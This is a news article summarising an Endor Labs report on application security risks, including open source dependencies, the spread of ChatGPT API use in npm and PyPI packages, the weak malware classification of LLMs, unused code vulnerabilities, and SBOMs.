LLMs and AI positioned to dominate the AppSec world
As modern software trends toward distributed architectures, microservices, and extensive use of third-party and open source components, dependency management only gets harder, according to Endor Labs.
Application development risks
A new research report explores emerging trends that software organizations need to consider as part of their security strategy, and risks associated with the use of existing open source software (OSS) in application development.
In particular, as modern software development increasingly adopts distributed architectures and microservices alongside third party and open source components, the report tracks the astonishing popularity of ChatGPT’s API, how current large language model (LLM)-based AI platforms are unable to accurately classify malware risk in most cases, and how almost half of all applications make no calls at all to security-sensitive APIs in their code base.
“The fact that there’s been such a rapid expansion of new technologies related to Artificial Intelligence, and that these capabilities are being integrated into so many other applications, is truly remarkable—but it’s equally important to monitor the risks they bring with them,” said Henrik Plate, lead security researcher at Endor Labs Station9.
“These advances can cause considerable harm if the packages selected introduce malware and other risks to the software supply chain. This report offers an early look into this critical function, just as early adopters of matching security protocols will benefit most from these capabilities,” added Plate.
Unused code vulnerabilities
Existing LLM technologies still can’t be used to reliably assist in malware detection and scale–in fact, they accurately classify malware risk in barely 5% of all cases. They have value in manual workflows, but will likely never be fully reliable in autonomous workflows. That’s because they can’t be trained to recognize novel approaches, such as those derived through LLM recommendations.
45% of applications have no calls to security-sensitive APIs in their code base, but that number actually drops to 5% when dependencies are included. Organizations routinely underestimate risk when they don’t analyze their use of such APIs through open source dependencies.
Even though 71% of typical Java application code is from open source components, applications use only 12% of imported code. Vulnerabilities in unused code are rarely exploitable; organizations can eliminate or de-prioritize 60% of remediation work with reliable insights into which code is reachable throughout an application.
LLM applications security
It’s been barely five months since ChatGPT’s API was released, but Endor Labs’ research has already identified that it’s used in 900 npm and PyPi packages across diverse problem domains. 75% of those are brand new packages.
While the advances are undeniable, organizations of all sizes need to practice due diligence when selecting packages. That’s because the combination of extreme popularity and a lack of historical data represents fertile ground for potential attacks.
Focusing specifically on LLM applications in security, the research uncovers how LLM can effectively create and hide malware, and even become a nemesis to defensive LLM applications. Given this landscape, organizations will need to document the components and vulnerabilities their applications include, such as through a Software Bill of Materials (SBOM).
Applications typically use only a small percentage of the open source components they integrate, while developers seldom understand the torrent of dependencies in each of those components.
To satisfy transparency requirements and protect the brand, it’s important for organizations to go beyond standard SBOMs. They need to understand not only the list of components but also how they’re being used within their applications, and which vulnerabilities are exploitable. This will enable a better understanding of risk, improve productivity and reduce cost.